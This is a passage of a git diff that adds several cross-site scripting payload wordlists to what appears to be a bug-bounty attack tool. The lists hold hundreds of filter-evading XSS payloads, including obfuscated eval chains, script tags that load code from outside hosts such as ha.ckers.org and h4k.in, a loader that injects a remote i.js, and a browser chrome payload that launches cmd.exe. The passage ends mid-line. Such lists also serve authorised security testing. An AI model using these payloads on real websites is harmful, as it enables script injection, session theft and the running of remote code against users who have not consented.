+<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<A HREF="http://6&#09;6.000146.0x7.147/">XSS</A> +<IMG SRC="mocha:[code]"> + style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a=" + sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a=" +<IMGSRC="javascript:alert('XSS')"> +b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name +a=/ev/// .source a+=/al/// .source a[a] (name) +a=/ev/ .source a+=/al/ .source,a = a[a] a(name) +setTimeout// +(name// ,0) +navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) +<SCRIPT SRC=http://ha.ckers.org/xss.js +<SCRIPT>a=/XSS/alert(a.source)</SCRIPT> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert("XSS")> +</noscript><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code> +perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out +perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out +<body onload=;;;;;;;;;;;_=alert;_(1);;;; +s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i); +<body <body onload=;;;;;al:eval('al'+'ert(1)');;> +<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41> +<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29> +<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041> +>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a; + alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> +(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0) +<body/s/onload=x={doc:parent.document};x.doc.writeln(1) +<body/””$/onload=x={doc:parent['document']};x.doc.writeln(1) +<body/""$/onload=x={doc:parent['document']};x.doc.writeln(1) +123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>); +s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a) +o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</s>};function f() { 0[this.x](this.y) }f.call(o); +___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___) +<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> +a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";eval(a+b+c+d); +<A HREF="http://0102.0146.0007.00000223/">XSS</A> +open(name) +<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +alert(1) +<A HREF="//www.google.com/">XSS</A> +<SCRIPT SRC=//ha.ckers.org/.j> +0%0d%0a%00<script src=//h4k.in> +s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+'';u1=s1+s2+s3;URL=u1 +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<A HREF="http://google.com/">XSS</A> +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 +<SCRIPT>alert('XSS')</SCRIPT> +<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +a=0||'ev'+'al',b=0||location.hash,c=0||'sub'+'str',1[a](b[c](1)) +a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b)) +eval.call(this,unescape.call(this,location)) +d=0||'une'+'scape'||0;a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n'||0;c=b[a];d=c(d);c(d(c(b))) +l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a +_=eval,__=unescape,___=document.URL,_(__(___)) +$_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__) +$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($)) +evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7[evil](cod) +with(location)with(hash)eval(substring(1)) +<IMG SRC=" &#14; javascript:alert('XSS');"> +<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<STYLE TYPE="text/javascript">alert('XSS');</STYLE> +<style>body:after{content: “\61\6c\65\72\74\28\31\29″}</style><script> +eval(eval(document.styleSheets[0].cssRules[0].style.content)) +</script> +<XSS STYLE="xss:expression(alert('XSS'))"> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +}</style><script>a=eval;b=alert;a(b(/i/.source));</script> +>"' +a=alert;a(0) +A=alert;A(1) +<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> +</textarea><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code> +'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' +http://aa"><script>alert(123)</script> +http://aa'><script>alert(123)</script> +>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-EnDe-mario.txt b/bounty_drive/attacks/xss/payloads/XSS-EnDe-mario.txt new file mode 100644 index 0000000..2f2c2e6 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-EnDe-mario.txt @@ -0,0 +1,52 @@ +';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){// +';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");} +'';!--"<script>alert(0);</script>=&{(alert(1))} +"><script>alert(0);</script> +'><script>alert(0);</script> +'<script>alert(0);</script> +<img src=x onerror=;;alert(1) /> +</title><script>alert(1)</script> +`> <script>alert(5)</script> +</textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code> +</noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code> +}</style><script>a=eval;b=alert;a(b(/i/.source));</script> +;}alert(0);{ +"+alert(0)+" +xyz onerror=alert(6); +onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source); +a=eval;b=alert;a(b(8)); +a=1;a=eval;b=alert;a(b(11));// +';//%0da=eval;b=alert;a(b(9));// +";//%0da=eval;b=alert;a(b(10));// +'};a=eval;b=alert;a(b(13));// +"};a=eval;b=alert;a(b(12));// +1};a=eval;b=alert;a(b(14));// +'];a=eval;b=alert;a(b(15));// +"];a=eval;b=alert;a(b(16));// +1];a=eval;b=alert;a(b(17));// +1;a=eval;b=alert;a(b(/c/.source)); +%0da=eval;b=alert;a(b(/d/.source)); +*/a=eval;b=alert;a(b(/e/.source));/* +<script src=//h4k.in +<script src=http://h4k.in/> +<script src=//h4k.in></script> +"><script src=//h4k.in></script>< +<scri +pt src=//h4k.in>< +></script> +<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e +"><script src=http://h4k.in/i.js></script> +"><script>a=document.createElement('script');a.src='http://h4k.in/i.js';document.body.appendChild(a);</script> +"><script>eval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59))</script> +vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83))) +" style="color: expression(alert(0));" a=" +</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')"> +<img src=`x` onrerror= ` ;; alert(1) ` /> +" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a=" +" sstyle="foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a=" +%0aContent-Type:text/html%0a%0a%3cscript%3ealert(0)%3c/script%3ehttp://www.google.de/ +c%00""<script>alert(0);</script> +BODY{-moz-binding:url("http://h4k.in/mozxss.xml%23xss")} +x=alert;x(%26%2340 /finally through!/.source %26%2341); +%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);// +http://aa<script>alert(123)</script> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-EnDe-xssAttacks.txt b/bounty_drive/attacks/xss/payloads/XSS-EnDe-xssAttacks.txt new file mode 100644 index 0000000..9999feb --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-EnDe-xssAttacks.txt @@ -0,0 +1,109 @@ +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} +'';!--"<XSS>=&{()} +<SCRIPT>alert('XSS')</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<BASE HREF="javascript:alert('XSS');//"> +<BGSOUND SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS');"> +<BODY ONLOAD=alert('XSS')> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG DYNSRC="javascript:alert('XSS');"> +<IMG LOWSRC="javascript:alert('XSS');"> +<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +exp/*<XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS +<IMG SRC='vbscript:msgbox("XSS")'> +<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> +<IMG SRC="livescript:[code]"> +%BCscript%BEalert(%A2XSS%A2)%BC/script%BE +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IMG SRC="mocha:[code]"> +<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> +<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> +a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";eval(a+b+c+d); +<STYLE TYPE="text/javascript">alert('XSS');</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +<XSS STYLE="xss:expression(alert('XSS'))"> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> +<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> +<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> +<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML> +<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> +<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> +<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +<BR SIZE="&{alert('XSS')}"> +<%3C&lt&lt;&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060&#60;&#060;&#0060;&#00060;&#000060;&#0000060;&#x3c&#x03c&#x003c&#x0003c&#x00003c&#x000003c&#x3c;&#x03c;&#x003c;&#x0003c;&#x00003c;&#x000003c;&#X3c&#X03c&#X003c&#X0003c&#X00003c&#X000003c&#X3c;&#X03c;&#X003c;&#X0003c;&#X00003c;&#X000003c;&#x3C&#x03C&#x003C&#x0003C&#x00003C&#x000003C&#x3C;&#x03C;&#x003C;&#x0003C;&#x00003C;&#x000003C;&#X3C&#X03C&#X003C&#X0003C&#X00003C&#X000003C&#X3C;&#X03C;&#X003C;&#X0003C;&#X00003C;&#X000003C;\x3c\x3C\u003c\u003C +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +\";alert('XSS');// +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out +perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT SRC=http://ha.ckers.org/xss.js +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<IFRAME SRC=http://ha.ckers.org/scriptlet.html < +<<SCRIPT>alert("XSS");//<</SCRIPT> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<SCRIPT>a=/XSS/alert(a.source)</SCRIPT> +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<A HREF="http://66.102.7.147/">XSS</A> +<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> +<A HREF="http://1113982867/">XSS</A> +<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> +<A HREF="http://0102.0146.0007.00000223/">XSS</A> +<A HREF="htt p://6&#09;6.000146.0x7.147/">XSS</A> +<A HREF="//www.google.com/">XSS</A> +<A HREF="//google">XSS</A> +<A HREF="http://ha.ckers.org@google">XSS</A> +<A HREF="http://google:ha.ckers.org">XSS</A> +<A HREF="http://google.com/">XSS</A> +<A HREF="http://www.google.com./">XSS</A> +<A HREF="javascript:document.location='http://www.google.com/'">XSS</A> +<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-Fuzzing.txt b/bounty_drive/attacks/xss/payloads/XSS-Fuzzing.txt new file mode 100644 index 0000000..c3cb825 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-Fuzzing.txt @@ -0,0 +1,3807 @@ +script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +</script><script>alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 